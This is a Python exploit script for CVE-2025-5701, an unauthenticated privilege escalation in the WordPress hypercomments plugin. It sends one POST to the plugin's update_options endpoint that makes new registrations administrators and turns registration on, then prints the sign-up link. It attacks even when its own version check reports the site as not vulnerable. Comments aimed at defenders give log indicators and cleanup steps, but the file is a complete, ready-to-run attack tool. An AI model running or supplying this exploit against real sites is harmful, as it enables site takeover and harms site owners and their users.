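import requests
import argparse
import time
import sys
from urllib.parse import urlparse

# Exploit By : Khaled ALenazi (Nxploited )
#
# Reviewer notes on what this proof of concept shows, for defenders:
#   * The only state-changing request is a single POST to
#     /wp-admin/index.php?hc_action=update_options whose form field "data"
#     carries JSON setting the WordPress options "default_role" and
#     "users_can_register". It is sent without cookies or credentials.
#   * Detection: look for that query string in web-server access logs, and
#     compare the current values of those two options with the intended
#     site configuration.
#   * Response: restore both options, review accounts registered after the
#     first such request, and remove or update the hypercomments plugin
#     (this script treats versions up to 1.2.2 as affected).

# TLS certificate verification is disabled on every request below
# (verify=False), so this call only silences the resulting warnings.
requests.packages.urllib3.disable_warnings()

# Highest plugin version this script reports as vulnerable.
LAST_AFFECTED_VERSION = (1, 2, 2)


def banner():
    """Print the tool banner."""
    print("\nCVE-2025-5701 - Unauthenticated Privilege Escalation Exploit")
    print("By: Khaled Alenazi (Nxploited)\n")


def _version_tuple(version):
    """Turn a dotted version string into a tuple of ints, or None.

    Only the leading ASCII digits of each dot-separated piece are used, so
    "1.2.2-beta" parses as (1, 2, 2). A piece with no leading digit makes
    the whole string unparseable and None is returned.
    """
    numbers = []
    for piece in version.split('.'):
        digits = ''
        for ch in piece:
            if ch not in '0123456789':
                break
            digits += ch
        if not digits:
            return None
        numbers.append(int(digits))
    return tuple(numbers)


def check_version(base_url):
    """Report whether the plugin readme advertises an affected version.

    Fetches wp-content/plugins/hypercomments/readme.txt and reads the first
    "Stable tag:" line. Returns True only when that version is at or below
    LAST_AFFECTED_VERSION; every other outcome (newer version, missing
    readme, unparseable tag, request error) returns False.

    The readme is a heuristic: it can be absent, blocked or stale, so a
    False result is not evidence that a site is patched.

    Reads the module-level ``user_agent``, which is assigned only in the
    ``__main__`` block.
    """
    readme_url = base_url.rstrip('/') + '/wp-content/plugins/hypercomments/readme.txt'
    try:
        response = requests.get(readme_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
        if response.status_code == 200:
            if 'Stable tag:' in response.text:
                for line in response.text.splitlines():
                    if 'Stable tag:' in line:
                        version = line.split('Stable tag:')[1].strip()
                        # Compare numerically: a plain string comparison
                        # orders "1.10.0" before "1.2.2" and misreports it.
                        parsed = _version_tuple(version)
                        if parsed is None:
                            print(f"[!] Could not parse version string '{version}' from readme.txt.")
                            return False
                        if parsed <= LAST_AFFECTED_VERSION:
                            print(f"[+] Target is vulnerable (version: {version}) - proceeding with exploitation.")
                            return True
                        else:
                            print(f"[-] Target is not vulnerable (version: {version}) - attempting exploitation anyway.")
                            return False
            print("[!] Version string not found in readme.txt - attempting exploitation anyway.")
            return False
        else:
            print("[!] readme.txt not found - proceeding cautiously.")
            return False
    except Exception as e:
        print(f"[!] Error checking readme.txt: {e}")
        return False


def verify_path(base_url):
    """Return True when an OPTIONS request to the endpoint answers 200 or 405.

    Only the HTTP status code is inspected; the response body is ignored, so
    a True result does not by itself show that the plugin handles the
    ``hc_action`` parameter.
    """
    test_url = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
    try:
        response = requests.options(test_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
        if response.status_code in [200, 405]:
            print("[+] Exploit endpoint is accessible.")
            return True
        else:
            print("[-] Exploit endpoint not found.")
            return False
    except Exception as e:
        print(f"[!] Failed to verify exploit path: {e}")
        return False


def Exploit_Nxploited(base_url):
    """Send the option-update POST and print the outcome.

    The request body sets "default_role" to "administrator" and
    "users_can_register" to "1". Success is reported when the response is
    HTTP 200 and its body contains "success"; nothing is returned.

    For defenders, this one request is the log indicator, and the two
    options it names are the values to check and restore on an affected
    site.
    """
    endpoint = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
    data = {
        "data": '{"default_role":"administrator","users_can_register":"1"}'
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": user_agent
    }

    try:
        time.sleep(3)  # Silent wait
        response = requests.post(endpoint, data=data, headers=headers, verify=False, timeout=10)
        if response.status_code == 200 and "success" in response.text:
            print(f"[+] Server response: {response.text.strip()}")
            print(f"[+] Registration is now enabled. New users will be assigned administrator role.")
            print(f"[+] Register here: {base_url.rstrip('/')}/wp-login.php?action=register")
        else:
            print(f"[-] Exploit failed. HTTP {response.status_code} - {response.text}")
    except Exception as e:
        print(f"[!] Exploit request failed: {e}")

    print("\nExploit by: Khaled Alenazi (Nxploited)")


def validate_url(url):
    """Return ``url`` with a scheme, probing HTTPS first when none is given.

    A URL that already has a scheme is returned unchanged. Otherwise one GET
    is sent to ``https://<url>``; if it raises a requests exception the
    ``http://`` form is returned instead.
    """
    parsed = urlparse(url)
    if not parsed.scheme:
        test_https = "https://" + url
        try:
            requests.get(test_https, timeout=5, verify=False)
            return test_https
        except requests.exceptions.RequestException:
            return "http://" + url
    return url


if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(
        description="CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://site.com)")
    args = parser.parse_args()

    # Module-level global read by check_version, verify_path and
    # Exploit_Nxploited; it exists only when the file is run as a script.
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    base_url = validate_url(args.url)

    # The result of check_version is informational only; the next step is
    # gated on verify_path alone.
    check_version(base_url)
    if verify_path(base_url):
        Exploit_Nxploited(base_url)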